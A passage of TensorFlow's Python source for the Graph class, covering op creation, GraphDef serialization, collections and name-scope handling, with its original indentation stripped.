A list of n 4-tuples or 5-tuples
(filename, lineno, name, code, [optional: func_start_lineno]), where the
code tuple element is calculated from the corresponding elements of the
input tuple.
"""
ret = []
for (filename, lineno, name, frame_globals, func_start_lineno,
unused_frame_info) in stack:
linecache.checkcache(filename)
line = linecache.getline(filename, lineno, frame_globals)
if line:
line = line.strip()
else:
line = None
if include_func_start_lineno:
ret.append((filename, lineno, name, line, func_start_lineno))
else:
ret.append((filename, lineno, name, line))
return ret
# Note: this method is private because the API of tf.Graph() is public and
# frozen, and this functionality is still not ready for public visibility.
@tf_contextlib.contextmanager
def _variable_creator_scope(self, creator):
# This step makes a copy of the existing stack, and it also initializes
# self._thread_local._variable_creator_stack if it doesn't exist yet.
old = list(self._variable_creator_stack)
self._thread_local._variable_creator_stack.append(creator)
try:
yield
finally:
self._thread_local._variable_creator_stack = old
# Note: this method is private because the API of tf.Graph() is public and
# frozen, and this functionality is still not ready for public visibility.
@property
def _variable_creator_stack(self):
if not hasattr(self._thread_local, "_variable_creator_stack"):
self._thread_local._variable_creator_stack = []
return list(self._thread_local._variable_creator_stack)
@_variable_creator_stack.setter
def _variable_creator_stack(self, variable_creator_stack):
self._thread_local._variable_creator_stack = variable_creator_stack
def _extract_stack(self):
"""A lightweight, extensible re-implementation of traceback.extract_stack.
NOTE(mrry): traceback.extract_stack eagerly retrieves the line of code for
each stack frame using linecache, which results in an abundance of stat()
calls. This implementation does not retrieve the code, and any consumer
should apply _convert_stack to the result to obtain a traceback that can
be formatted etc. using traceback methods.
Derived classes can implement _extract_frame_info() to add extra information
to the traceback.
Returns:
A list of 6-tuples
(filename, lineno, name, frame_globals, func_start_lineno, custom_info)
corresponding to the call stack of the current thread.
"""
try:
raise ZeroDivisionError
except ZeroDivisionError:
f = sys.exc_info()[2].tb_frame.f_back
ret = []
while f is not None:
lineno = f.f_lineno
co = f.f_code
filename = co.co_filename
name = co.co_name
frame_globals = f.f_globals
func_start_lineno = co.co_firstlineno
frame_info = self._extract_frame_info(f)
ret.append((filename, lineno, name, frame_globals, func_start_lineno,
frame_info))
f = f.f_back
ret.reverse()
return ret
def _extract_frame_info(self, frame): # pylint: disable=unused-argument
"""Extracts custom information from a frame in an op traceback."""
return None
def _check_not_finalized(self):
"""Check if the graph is finalized.
Raises:
RuntimeError: If the graph finalized.
"""
if self._finalized:
raise RuntimeError("Graph is finalized and cannot be modified.")
def _add_op(self, op):
"""Adds 'op' to the graph.
Args:
op: the Operator or Tensor to add.
Raises:
TypeError: if op is not an Operation or Tensor.
ValueError: if the op.name or op._id are already used.
"""
self._check_not_finalized()
if not isinstance(op, (Tensor, Operation)):
raise TypeError("op must be a Tensor or Operation: %s" % op)
with self._lock:
# pylint: disable=protected-access
if op._id in self._nodes_by_id:
raise ValueError("cannot add an op with id %d as it already "
"exists in the graph" % op._id)
if op.name in self._nodes_by_name:
raise ValueError("cannot add op with name %s as that name "
"is already used" % op.name)
self._nodes_by_id[op._id] = op
self._nodes_by_name[op.name] = op
self._version = max(self._version, op._id)
# pylint: enable=protected-access
@property
def _c_graph(self):
if self._scoped_c_graph:
return self._scoped_c_graph.graph
return None
@property
def version(self):
"""Returns a version number that increases as ops are added to the graph.
Note that this is unrelated to the
@{tf.Graph.graph_def_versions}.
Returns:
An integer version that increases as ops are added to the graph.
"""
if self._finalized:
return self._version
with self._lock:
return self._version
@property
def graph_def_versions(self):
# pylint: disable=line-too-long
"""The GraphDef version information of this graph.
For details on the meaning of each version, see
[`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto).
Returns:
A `VersionDef`.
"""
# pylint: enable=line-too-long
with c_api_util.tf_buffer() as buf:
c_api.TF_GraphVersions(self._c_graph, buf)
data = c_api.TF_GetBuffer(buf)
version_def = versions_pb2.VersionDef()
version_def.ParseFromString(compat.as_bytes(data))
return version_def
@property
def seed(self):
"""The graph-level random seed of this graph."""
return self._seed
@seed.setter
def seed(self, seed):
self._seed = seed
@property
def finalized(self):
"""True if this graph has been finalized."""
return self._finalized
def finalize(self):
"""Finalizes this graph, making it read-only.
After calling `g.finalize()`, no new operations can be added to
`g`. This method is used to ensure that no operations are added
to a graph when it is shared between multiple threads, for example
when using a @{tf.train.QueueRunner}.
"""
self._finalized = True
def _unsafe_unfinalize(self):
"""Opposite of `finalize`. Internal interface.
NOTE: Unfinalizing a graph could have negative impact on performance,
especially in a multi-threaded environment. Unfinalizing a graph
when it is in use by a Session may lead to undefined behavior. Ensure
that all sessions using a graph are closed before calling this method.
"""
self._finalized = False
def _get_control_flow_context(self):
"""Returns the current control flow context.
Returns:
A context object.
"""
return self._control_flow_context
def _set_control_flow_context(self, ctx):
"""Sets the current control flow context.
Args:
ctx: a context object.
"""
self._control_flow_context = ctx
def _copy_functions_to_graph_def(self, graph_def, starting_bytesize):
"""If this graph contains functions, copy them to `graph_def`."""
bytesize = starting_bytesize
for f in self._functions.values():
bytesize += f.definition.ByteSize()
if bytesize >= (1 << 31) or bytesize < 0:
raise ValueError("GraphDef cannot be larger than 2GB.")
graph_def.library.function.extend([f.definition])
if f.grad_func_name:
grad_def = function_pb2.GradientDef()
grad_def.function_name = f.name
grad_def.gradient_func = f.grad_func_name
graph_def.library.gradient.extend([grad_def])
def _as_graph_def(self, from_version=None, add_shapes=False):
# pylint: disable=line-too-long
"""Returns a serialized `GraphDef` representation of this graph.
The serialized `GraphDef` can be imported into another `Graph`
(using @{tf.import_graph_def}) or used with the
[C++ Session API](../../../../api_docs/cc/index.md).
This method is thread-safe.
Args:
from_version: Optional. If this is set, returns a `GraphDef`
containing only the nodes that were added to this graph since
its `version` property had the given value.
add_shapes: If true, adds an "_output_shapes" list attr to each
node with the inferred shapes of each of its outputs.
Returns:
A tuple containing a
[`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto)
protocol buffer, and the version of the graph to which that
`GraphDef` corresponds.
Raises:
ValueError: If the `graph_def` would be too large.
"""
# pylint: enable=line-too-long
with self._lock:
with c_api_util.tf_buffer() as buf:
c_api.TF_GraphToGraphDef(self._c_graph, buf)
data = c_api.TF_GetBuffer(buf)
graph = graph_pb2.GraphDef()
graph.ParseFromString(compat.as_bytes(data))
# Strip the experimental library field iff it's empty.
if not graph.library.function:
graph.ClearField("library")
if add_shapes:
for node in graph.node:
op = self._nodes_by_name[node.name]
if op.outputs:
node.attr["_output_shapes"].list.shape.extend(
[output.get_shape().as_proto() for output in op.outputs])
return graph, self._version
def as_graph_def(self, from_version=None, add_shapes=False):
# pylint: disable=line-too-long
"""Returns a serialized `GraphDef` representation of this graph.
The serialized `GraphDef` can be imported into another `Graph`
(using @{tf.import_graph_def}) or used with the
[C++ Session API](../../api_docs/cc/index.md).
This method is thread-safe.
Args:
from_version: Optional. If this is set, returns a `GraphDef`
containing only the nodes that were added to this graph since
its `version` property had the given value.
add_shapes: If true, adds an "_output_shapes" list attr to each
node with the inferred shapes of each of its outputs.
Returns:
A
[`GraphDef`](https://www.tensorflow.org/code/tensorflow/core/framework/graph.proto)
protocol buffer.
Raises:
ValueError: If the `graph_def` would be too large.
"""
# pylint: enable=line-too-long
result, _ = self._as_graph_def(from_version, add_shapes)
return result
def _is_function(self, name):
"""Tests whether 'name' is registered in this graph's function library.
Args:
name: string op name.
Returns:
bool indicating whether or not 'name' is registered in function library.
"""
return name in self._functions
def _get_function(self, name):
"""Returns the function definition for 'name'.
Args:
name: string function name.
Returns:
The function def proto.
"""
return self._functions.get(name, None)
def _add_function(self, function):
"""Adds a function to the graph.
After the function has been added, you can call to the function by
passing the function name in place of an op name to
`Graph.create_op()`.
Args:
function: A `_DefinedFunction` object.
Raises:
ValueError: if another function is defined with the same name.
"""
name = function.name
# Sanity checks on gradient definition.
if (function.grad_func_name is not None) and (function.python_grad_func is
not None):
raise ValueError("Gradient defined twice for function %s" % name)
# Add function to graph
# pylint: disable=protected-access
# Handle functions created without using the C API. TODO(apassos,skyewm)
# remove this when all functions are generated using the C API by default
# as this will be unnecessary.
if not function._c_func:
serialized = function.definition.SerializeToString()
c_func = c_api.TF_FunctionImportFunctionDef(serialized)
function._c_func = c_api_util.ScopedTFFunction(c_func)
gradient = (function._grad_func._c_func.func if function._grad_func
else None)
c_api.TF_GraphCopyFunction(self._c_graph, function._c_func.func, gradient)
# pylint: enable=protected-access
self._functions[name] = function
# Need a new-enough consumer to support the functions we add to the graph.
if self._graph_def_versions.min_consumer < 12:
self._graph_def_versions.min_consumer = 12
@property
def building_function(self):
"""Returns True iff this graph represents a function."""
return self._building_function
# Helper functions to create operations.
@deprecated_args(None,
"Shapes are always computed; don't use the compute_shapes "
"as it has no effect.", "compute_shapes")
def create_op(
self,
op_type,
inputs,
dtypes, # pylint: disable=redefined-outer-name
input_types=None,
name=None,
attrs=None,
op_def=None,
compute_shapes=True,
compute_device=True):
"""Creates an `Operation` in this graph.
This is a low-level interface for creating an `Operation`. Most
programs will not call this method directly, and instead use the
Python op constructors, such as `tf.constant()`, which add ops to
the default graph.
Args:
op_type: The `Operation` type to create. This corresponds to the
`OpDef.name` field for the proto that defines the operation.
inputs: A list of `Tensor` objects that will be inputs to the `Operation`.
dtypes: A list of `DType` objects that will be the types of the tensors
that the operation produces.
input_types: (Optional.) A list of `DType`s that will be the types of
the tensors that the operation consumes. By default, uses the base
`DType` of each input in `inputs`. Operations that expect
reference-typed inputs must specify `input_types` explicitly.
name: (Optional.) A string name for the operation. If not specified, a
name is generated based on `op_type`.
attrs: (Optional.) A dictionary where the key is the attribute name (a
string) and the value is the respective `attr` attribute of the
`NodeDef` proto that will represent the operation (an `AttrValue`
proto).
op_def: (Optional.) The `OpDef` proto that describes the `op_type` that
the operation will have.
compute_shapes: (Optional.) Deprecated. Has no effect (shapes are always
computed).
compute_device: (Optional.) If True, device functions will be executed
to compute the device property of the Operation.
Raises:
TypeError: if any of the inputs is not a `Tensor`.
ValueError: if colocation conflicts with existing device assignment.
Returns:
An `Operation` object.
"""
del compute_shapes
self._check_not_finalized()
for idx, a in enumerate(inputs):
if not isinstance(a, Tensor):
raise TypeError("Input #%d is not a tensor: %s" % (idx, a))
if name is None:
name = op_type
# If a names ends with a '/' it is a "name scope" and we use it as-is,
# after removing the trailing '/'.
if name and name[-1] == "/":
name = _name_from_scope_name(name)
else:
name = self.unique_name(name)
node_def = _NodeDef(op_type, name, device=None, attrs=attrs)
input_ops = set([t.op for t in inputs])
control_inputs = self._control_dependencies_for_inputs(input_ops)
# _create_op_helper mutates the new Operation. _lock ensures a Session.run
# call cannot occur between creating and mutating the op.
with self._lock:
ret = Operation(
node_def,
self,
inputs=inputs,
output_types=dtypes,
control_inputs=control_inputs,
input_types=input_types,
original_op=self._default_original_op,
op_def=op_def)
self._create_op_helper(ret, compute_device=compute_device)
return ret
def _create_op_from_tf_operation(self, c_op, compute_device=True):
"""Creates an `Operation` in this graph from the supplied TF_Operation.
This method is like create_op() except the new Operation is constructed
using `c_op`. The returned Operation will have `c_op` as its _c_op
field. This is used to create Operation objects around TF_Operations created
indirectly by the C API (e.g. by TF_ImportGraphDef, TF_FinishWhile).
This function does not call Operation._control_flow_post_processing or
Graph._control_dependencies_for_inputs (since the inputs may not be
available yet). The caller is responsible for calling these methods.
Args:
c_op: a wrapped TF_Operation
compute_device: (Optional.) If True, device functions will be executed
to compute the device property of the Operation.
Returns:
An `Operation` object.
"""
self._check_not_finalized()
ret = Operation(c_op, self)
# If a name_scope was created with ret.name but no nodes were created in it,
# the name will still appear in _names_in_use even though the name hasn't
# been used. This is ok, just leave _names_in_use as-is in this case.
# TODO(skyewm): make the C API guarantee no name conflicts.
name_key = ret.name.lower()
if name_key not in self._names_in_use:
self._names_in_use[name_key] = 1
self._create_op_helper(ret, compute_device=compute_device)
return ret
def _create_op_helper(self, op, compute_device=True):
"""Common logic for creating an op in this graph."""
# Apply any additional attributes requested. Do not overwrite any existing
# attributes.
for key, value in self._attr_scope_map.items():
try:
op.get_attr(key)
except ValueError:
if callable(value):
value = value(op.node_def)
if not isinstance(value, (type(None), attr_value_pb2.AttrValue)):
raise TypeError(
"Callable for scope map key '%s' must return either None or "
"an AttrValue protocol buffer; but it returned: %s" % (key,
value))
if value:
op._set_attr(key, value) # pylint: disable=protected-access
# Apply a kernel label if one has been specified for this op type.
try:
kernel_label = self._op_to_kernel_label_map[op.type]
op._set_attr("_kernel", # pylint: disable=protected-access
attr_value_pb2.AttrValue(s=compat.as_bytes(kernel_label)))
except KeyError:
pass
# Apply the overriding op type for gradients if one has been specified for
# this op type.
try:
mapped_op_type = self._gradient_override_map[op.type]
op._set_attr("_gradient_op_type", # pylint: disable=protected-access
attr_value_pb2.AttrValue(s=compat.as_bytes(mapped_op_type)))
except KeyError:
pass
self._record_op_seen_by_control_dependencies(op)
if compute_device:
self._apply_device_functions(op)
if self._colocation_stack:
all_colocation_groups = []
for colocation_op in self._colocation_stack:
all_colocation_groups.extend(colocation_op.colocation_groups())
if colocation_op.device:
# Make this device match the device of the colocated op, to provide
# consistency between the device and the colocation property.
if (op.device and pydev.canonical_name(op.device) !=
pydev.canonical_name(colocation_op.device)):
logging.warning("Tried to colocate %s with an op %s that had "
"a different device: %s vs %s. Postponing "
"error-checking until all devices are assigned.",
op.name, colocation_op.name, op.device,
colocation_op.device)
else:
op._set_device(colocation_op.device) # pylint: disable=protected-access
all_colocation_groups = sorted(set(all_colocation_groups))
# pylint: disable=protected-access
op._set_attr("_class", attr_value_pb2.AttrValue(
list=attr_value_pb2.AttrValue.ListValue(s=all_colocation_groups)))
# pylint: enable=protected-access
# Sets "container" attribute if
# (1) self._container is not None
# (2) "is_stateful" is set in OpDef
# (3) "container" attribute is in OpDef
# (4) "container" attribute is None
if self._container and op.op_def.is_stateful:
try:
container_attr = op.get_attr("container")
except ValueError:
# "container" attribute is not in OpDef
pass
else:
if not container_attr:
op._set_attr("container", attr_value_pb2.AttrValue( # pylint: disable=protected-access
s=compat.as_bytes(self._container)))
def _add_new_tf_operations(self, compute_devices=True):
"""Creates `Operations` in this graph for any new TF_Operations.
This is useful for when TF_Operations are indirectly created by the C API
outside of the Operation constructor (e.g. by TF_ImportGraphDef,
TF_FinishWhile). This ensures there are corresponding Operations for all
TF_Operations in the underlying TF_Graph.
Args:
compute_devices: (Optional.) If True, device functions will be executed
to compute the device properties of each new Operation.
Returns:
A list of the new `Operation` objects.
"""
# Create all Operation objects before accessing their inputs since an op may
# be created before its inputs.
new_ops = [
self._create_op_from_tf_operation(c_op, compute_device=compute_devices)
for c_op in c_api_util.new_tf_operations(self)
]
# pylint: disable=protected-access
for op in new_ops:
# Operations created by the C API always retrieve shapes from the C API so
# we preserve the shapes of ops created in import_graph_def (from the
# "_output_shapes" attr of the imported NodeDef).
if not _USE_C_SHAPES:
_set_shape_and_handle_data_for_outputs_c_api(op)
new_control_inputs = self._control_dependencies_for_inputs(op.inputs)
op._add_control_inputs(new_control_inputs)
op._control_flow_post_processing()
# pylint: enable=protected-access
return new_ops
def as_graph_element(self, obj, allow_tensor=True, allow_operation=True):
"""Returns the object referred to by `obj`, as an `Operation` or `Tensor`.
This function validates that `obj` represents an element of this
graph, and gives an informative error message if it is not.
This function is the canonical way to get/validate an object of
one of the allowed types from an external argument reference in the
Session API.
This method may be called concurrently from multiple threads.
Args:
obj: A `Tensor`, an `Operation`, or the name of a tensor or operation.
Can also be any object with an `_as_graph_element()` method that returns
a value of one of these types.
allow_tensor: If true, `obj` may refer to a `Tensor`.
allow_operation: If true, `obj` may refer to an `Operation`.
Returns:
The `Tensor` or `Operation` in the Graph corresponding to `obj`.
Raises:
TypeError: If `obj` is not a type we support attempting to convert
to types.
ValueError: If `obj` is of an appropriate type but invalid. For
example, an invalid string.
KeyError: If `obj` is not an object in the graph.
"""
if self._finalized:
return self._as_graph_element_locked(obj, allow_tensor, allow_operation)
with self._lock:
return self._as_graph_element_locked(obj, allow_tensor, allow_operation)
def _as_graph_element_locked(self, obj, allow_tensor, allow_operation):
"""See `Graph.as_graph_element()` for details."""
# The vast majority of this function is figuring
# out what an API user might be doing wrong, so
# that we can give helpful error messages.
#
# Ideally, it would be nice to split it up, but we
# need context to generate nice error messages.
if allow_tensor and allow_operation:
types_str = "Tensor or Operation"
elif allow_tensor:
types_str = "Tensor"
elif allow_operation:
types_str = "Operation"
else:
raise ValueError("allow_tensor and allow_operation can't both be False.")
temp_obj = _as_graph_element(obj)
if temp_obj is not None:
obj = temp_obj
# If obj appears to be a name...
if isinstance(obj, compat.bytes_or_text_types):
name = compat.as_str(obj)
if ":" in name and allow_tensor:
# Looks like a Tensor name and can be a Tensor.
try:
op_name, out_n = name.split(":")
out_n = int(out_n)
except:
raise ValueError("The name %s looks a like a Tensor name, but is "
"not a valid one. Tensor names must be of the "
"form \"<op_name>:<output_index>\"." % repr(name))
if op_name in self._nodes_by_name:
op = self._nodes_by_name[op_name]
else:
raise KeyError("The name %s refers to a Tensor which does not "
"exist. The operation, %s, does not exist in the "
"graph." % (repr(name), repr(op_name)))
try:
return op.outputs[out_n]
except:
raise KeyError("The name %s refers to a Tensor which does not "
"exist. The operation, %s, exists but only has "
"%s outputs." % (repr(name), repr(op_name),
len(op.outputs)))
elif ":" in name and not allow_tensor:
# Looks like a Tensor name but can't be a Tensor.
raise ValueError("Name %s appears to refer to a Tensor, not a %s." %
(repr(name), types_str))
elif ":" not in name and allow_operation:
# Looks like an Operation name and can be an Operation.
if name not in self._nodes_by_name:
raise KeyError("The name %s refers to an Operation not in the "
"graph." % repr(name))
return self._nodes_by_name[name]
elif ":" not in name and not allow_operation:
# Looks like an Operation name but can't be an Operation.
if name in self._nodes_by_name:
# Yep, it's an Operation name
err_msg = ("The name %s refers to an Operation, not a %s." %
(repr(name), types_str))
else:
err_msg = ("The name %s looks like an (invalid) Operation name, "
"not a %s." % (repr(name), types_str))
err_msg += (" Tensor names must be of the form "
"\"<op_name>:<output_index>\".")
raise ValueError(err_msg)
elif isinstance(obj, Tensor) and allow_tensor:
# Actually obj is just the object it's referring to.
if obj.graph is not self:
raise ValueError("Tensor %s is not an element of this graph." % obj)
return obj
elif isinstance(obj, Operation) and allow_operation:
# Actually obj is just the object it's referring to.
if obj.graph is not self:
raise ValueError("Operation %s is not an element of this graph." % obj)
return obj
else:
# We give up!
raise TypeError("Can not convert a %s into a %s." % (type(obj).__name__,
types_str))
def get_operations(self):
"""Return the list of operations in the graph.
You can modify the operations in place, but modifications
to the list such as inserts/delete have no effect on the
list of operations known to the graph.
This method may be called concurrently from multiple threads.
Returns:
A list of Operations.
"""
if self._finalized:
return list(self._nodes_by_id.values())
with self._lock:
return list(self._nodes_by_id.values())
def get_operation_by_name(self, name):
"""Returns the `Operation` with the given `name`.
This method may be called concurrently from multiple threads.
Args:
name: The name of the `Operation` to return.
Returns:
The `Operation` with the given `name`.
Raises:
TypeError: If `name` is not a string.
KeyError: If `name` does not correspond to an operation in this graph.
"""
if not isinstance(name, six.string_types):
raise TypeError("Operation names are strings (or similar), not %s." %
type(name).__name__)
return self.as_graph_element(name, allow_tensor=False, allow_operation=True)
def _get_operation_by_name_unsafe(self, name):
"""Returns the `Operation` with the given `name`.
This is a internal unsafe version of get_operation_by_name. It skips many
checks and does not have user friedly error messages but runs considerably
faster. This method may be called concurrently from multiple threads.
Args:
name: The name of the `Operation` to return.
Returns:
The `Operation` with the given `name`.
Raises:
KeyError: If `name` does not correspond to an operation in this graph.
"""
if self._finalized:
return self._nodes_by_name[name]
with self._lock:
return self._nodes_by_name[name]
def _get_operation_by_tf_operation(self, tf_oper):
op_name = c_api.TF_OperationName(tf_oper)
return self._get_operation_by_name_unsafe(op_name)
def get_tensor_by_name(self, name):
"""Returns the `Tensor` with the given `name`.
This method may be called concurrently from multiple threads.
Args:
name: The name of the `Tensor` to return.
Returns:
The `Tensor` with the given `name`.
Raises:
TypeError: If `name` is not a string.
KeyError: If `name` does not correspond to a tensor in this graph.
"""
# Names should be strings.
if not isinstance(name, six.string_types):
raise TypeError("Tensor names are strings (or similar), not %s." %
type(name).__name__)
return self.as_graph_element(name, allow_tensor=True, allow_operation=False)
def _get_tensor_by_tf_output(self, tf_output):
"""Returns the `Tensor` representing `tf_output`.
Note that there is only one such `Tensor`, i.e. multiple calls to this
function with the same TF_Output value will always return the same `Tensor`
object.
Args:
tf_output: A wrapped `TF_Output` (the C API equivalent of `Tensor`).
Returns:
The `Tensor` that represents `tf_output`.
"""
op = self._get_operation_by_tf_operation(tf_output.oper)
return op.outputs[tf_output.index]
def _next_id(self):
"""Id for next Operation instance. Also increments the internal id."""
self._check_not_finalized()
with self._lock:
self._next_id_counter += 1
return self._next_id_counter
@property
def _last_id(self):
return self._next_id_counter
def _get_op_def(self, type): # pylint: disable=redefined-builtin
"""Returns the `OpDef` proto for `type`. `type` is a string."""
with c_api_util.tf_buffer() as buf:
# pylint: disable=protected-access
c_api.TF_GraphGetOpDef(self._c_graph, compat.as_bytes(type), buf)
# pylint: enable=protected-access
data = c_api.TF_GetBuffer(buf)
op_def = op_def_pb2.OpDef()
op_def.ParseFromString(compat.as_bytes(data))
return op_def
def as_default(self):
"""Returns a context manager that makes this `Graph` the default graph.
This method should be used if you want to create multiple graphs
in the same process. For convenience, a global default graph is
provided, and all ops will be added to this graph if you do not
create a new graph explicitly. Use this method with the `with` keyword
to specify that ops created within the scope of a block should be
added to this graph.
The default graph is a property of the current thread. If you
create a new thread, and wish to use the default graph in that
thread, you must explicitly add a `with g.as_default():` in that
thread's function.
The following code examples are equivalent:
```python
# 1. Using Graph.as_default():
g = tf.Graph()
with g.as_default():
c = tf.constant(5.0)
assert c.graph is g
# 2. Constructing and making default:
with tf.Graph().as_default() as g:
c = tf.constant(5.0)
assert c.graph is g
```
If eager execution is enabled ops created under this context manager will be
added to the graph instead of executed eagerly.
Returns:
A context manager for using this graph as the default graph.
"""
return _default_graph_stack.get_controller(self)
@property
def collections(self):
"""Returns the names of the collections known to this graph."""
return list(self._collections)
def add_to_collection(self, name, value):
"""Stores `value` in the collection with the given `name`.
Note that collections are not sets, so it is possible to add a value to
a collection several times.
Args:
name: The key for the collection. The `GraphKeys` class
contains many standard names for collections.
value: The value to add to the collection.
""" # pylint: disable=g-doc-exception
self._check_not_finalized()
with self._lock:
if name not in self._collections:
self._collections[name] = [value]
else:
self._collections[name].append(value)
def add_to_collections(self, names, value):
"""Stores `value` in the collections given by `names`.
Note that collections are not sets, so it is possible to add a value to
a collection several times. This function makes sure that duplicates in
`names` are ignored, but it will not check for pre-existing membership of
`value` in any of the collections in `names`.
`names` can be any iterable, but if `names` is a string, it is treated as a
single collection name.
Args:
names: The keys for the collections to add to. The `GraphKeys` class
contains many standard names for collections.
value: The value to add to the collections.
"""
# Make sure names are unique, but treat strings as a single collection name
names = (names,) if isinstance(names, six.string_types) else set(names)
for name in names:
self.add_to_collection(name, value)
def get_collection_ref(self, name):
"""Returns a list of values in the collection with the given `name`.
If the collection exists, this returns the list itself, which can
be modified in place to change the collection. If the collection does
not exist, it is created as an empty list and the list is returned.
This is different from `get_collection()` which always returns a copy of
the collection list if it exists and never creates an empty collection.
Args:
name: The key for the collection. For example, the `GraphKeys` class
contains many standard names for collections.
Returns:
The list of values in the collection with the given `name`, or an empty
list if no value has been added to that collection.
""" # pylint: disable=g-doc-exception
with self._lock:
coll_list = self._collections.get(name, None)
if coll_list is None:
coll_list = []
self._collections[name] = coll_list
return coll_list
def get_collection(self, name, scope=None):
"""Returns a list of values in the collection with the given `name`.
This is different from `get_collection_ref()` which always returns the
actual collection list if it exists in that it returns a new list each time
it is called.
Args:
name: The key for the collection. For example, the `GraphKeys` class
contains many standard names for collections.
scope: (Optional.) A string. If supplied, the resulting list is filtered
to include only items whose `name` attribute matches `scope` using
`re.match`. Items without a `name` attribute are never returned if a
scope is supplied. The choice of `re.match` means that a `scope` without
special tokens filters by prefix.
Returns:
The list of values in the collection with the given `name`, or
an empty list if no value has been added to that collection. The
list contains the values in the order under which they were
collected.
""" # pylint: disable=g-doc-exception
with self._lock:
collection = self._collections.get(name, None)
if collection is None:
return []
if scope is None:
return list(collection)
else:
c = []
regex = re.compile(scope)
for item in collection:
if hasattr(item, "name") and regex.match(item.name):
c.append(item)
return c
def get_all_collection_keys(self):
"""Returns a list of collections used in this graph."""
with self._lock:
return [x for x in self._collections if isinstance(x, six.string_types)]
def clear_collection(self, name):
"""Clears all values in a collection.
Args:
name: The key for the collection. The `GraphKeys` class contains many
standard names for collections.
"""
self._check_not_finalized()
with self._lock:
if name in self._collections:
del self._collections[name]
@tf_contextlib.contextmanager
def _original_op(self, op):
"""Python 'with' handler to help annotate ops with their originator.
An op may have an 'original_op' property that indicates the op on which
it was based. For example a replica op is based on the op that was
replicated and a gradient op is based on the op that was differentiated.
All ops created in the scope of this 'with' handler will have
the given 'op' as their original op.
Args:
op: The Operation that all ops created in this scope will have as their
original op.
Yields:
Nothing.
"""
old_original_op = self._default_original_op
try:
self._default_original_op = op
yield
finally:
self._default_original_op = old_original_op
@property
def _name_stack(self):
# This may be called from a thread where name_stack doesn't yet exist.
if not hasattr(self._thread_local, "_name_stack"):
self._thread_local._name_stack = ""
return self._thread_local._name_stack
@_name_stack.setter
def _name_stack(self, name_stack):
self._thread_local._name_stack = name_stack
# pylint: disable=g-doc-return-or-yield,line-too-long
@tf_contextlib.contextmanager
def name_scope(self, name):
r"""Returns a context manager that creates hierarchical names for operations.
A graph maintains a stack of name scopes. A `with name_scope(...):`
statement pushes a new name onto the stack for the lifetime of the context.
The `name` argument will be interpreted as follows:
* A string (not ending with '/') will create a new name scope, in which
`name` is appended to the prefix of all operations created in the
context. If `name` has been used before, it will be made unique by
calling `self.unique_name(name)`.
* A scope previously captured from a `with g.name_scope(...) as
scope:` statement will be treated as an "absolute" name scope, which
makes it possible to re-enter existing scopes.
* A value of `None` or the empty string will reset the current name scope
to the top-level (empty) name scope.
For example:
```python
with tf.Graph().as_default() as g:
c = tf.constant(5.0, name="c")
assert c.op.name == "c"
c_1 = tf.constant(6.0, name="c")
assert c_1.op.name == "c_1"
# Creates a scope called "nested"
with g.name_scope("nested") as scope:
nested_c = tf.constant(10.0, name="c")
assert nested_c.op.name == "nested/c"
# Creates a nested scope called "inner".
with g.name_scope("inner"):
nested_inner_c = tf.constant(20.0, name="c")
assert nested_inner_c.op.name == "nested/inner/c"
# Create a nested scope called "inner_1".
with g.name_scope("inner"):
nested_inner_1_c = tf.constant(30.0, name="c")
assert nested_inner_1_c.op.name == "nested/inner_1/c"
# Treats `scope` as an absolute name scope, and
# switches to the "nested/" scope.
with g.name_scope(scope):
nested_d = tf.constant(40.0, name="d")
assert nested_d.op.name == "nested/d"
with g.name_scope(""):
e = tf.constant(50.0, name="e")
assert e.op.name == "e"
```
The name of the scope itself can be captured by `with
g.name_scope(...) as scope:`, which stores the name of the scope
in the variable `scope`. This value can be used to name an
operation that represents the overall result of executing the ops
in a scope. For example:
```python
inputs = tf.constant(...)
with g.name_scope('my_layer') as scope:
weights = tf.Variable(..., name="weights")
biases = tf.Variable(..., name="biases")
affine = tf.matmul(inputs, weights) + biases
output = tf.nn.relu(affine, name=scope)
```
NOTE: This constructor validates the given `name`. Valid scope
names match one of the following regular expressions:
[A-Za-z0-9.][A-Za-z0-9_.\\-/]* (for scopes at the root)
[A-Za-z0-9_.\\-/]* (for other scopes)
Args:
name: A name for the scope.
Returns:
A context manager that installs `name` as a new name scope.
Raises:
ValueError: If `name` is not a valid scope name, according to the rules
above.
"""
if name:
if isinstance(name, compat.bytes_or_text_types):
name = compat.as_str(name)
if self._name_stack:
# Scopes created in a nested scope may have initial characters
# that are illegal as the initial character of an op name
# (viz. '-', '\', '/', and '_').
if not _VALID_SCOPE_NAME_REGEX.match(name):
raise ValueError("'%s' is not a valid scope name" % name)
else:
# Scopes created in the root must match the more restrictive
# op name regex, which constrains the initial character.
if not _VALID_OP_NAME_REGEX.match(name):
raise ValueError("'%s' is not a valid scope name" % name)
try:
old_stack = self._name_stack
if not name: # Both for name=None and name="" we re-set to empty scope.
new_stack = None
elif name[-1] == "/":
new_stack = _name_from_scope_name(name)
else:
new_stack = self.unique_name(name)
self._name_stack = new_stack
yield "" if new_stack is None else new_stack + "/"
finally:
self._name_stack = old_stack
# pylint: enable=g-doc-return-or-yield,line-too-long
def unique_name(self, name, mark_as_used=True):
"""Return a unique operation name for `name`.
Note: You rarely need to call `unique_name()` directly. Most of
the time you just need to create `with g.name_scope()` blocks to
generate structured names.
`unique_name` is used to generate structured names, separated by
`"/"`, to help identify operations when debugging a graph.
Operation names are displayed in error messages reported by the
TensorFlow runtime, and in various visualization tools such as
TensorBoard.
If `mark_as_used` is set to `True`, which is the default, a new
unique name is created and marked as in use. If it's set to `False`,
the unique name is returned without actually being marked as used.
This is useful when the caller simply wants to know what the name
to be created will be.
Args:
name: The name for an operation.
mark_as_used: Whether to mark this name as being used.
Returns:
A string to be passed to `create_op()` that will be used
to name the operation being created.
"""
if self._name_stack:
name = self._name_stack + "/" + name
# For the sake of checking for names in use, we treat names as case
# insensitive (e.g. foo = Foo).
name_key = name.lower()
i = self._names_in_use.get(name_key, 0)
# Increment the number for "name_key".
if mark_as_used:
self._names_in_use[name_key] = i + 1
if i > 0:
base_name_key = name_key
# Make sure the composed name key is not already used.
while name_key in self._names_in_use:
name_key = "%s_%d" % (base_name_key, i)
i += 1
# Mark the composed name_key as used in case someone wants
# to call unique_name("name_1").
if mark_as_used:
self._names_in_use[name_key] = 1
# Return the new name with the original capitalization of the given name.
name = "%s_%d" % (name, i-1)
return name
def get_name_scope(self):
"""Returns the current name scope.
For example:
```python
with tf.name_scope('scope1'):
with tf.name_scope('scope2'):
print(tf.get_default_graph().get_name_scope())
```
would print the string `scope1/scope2`.
Returns:
A string representing the current name scope.
"""
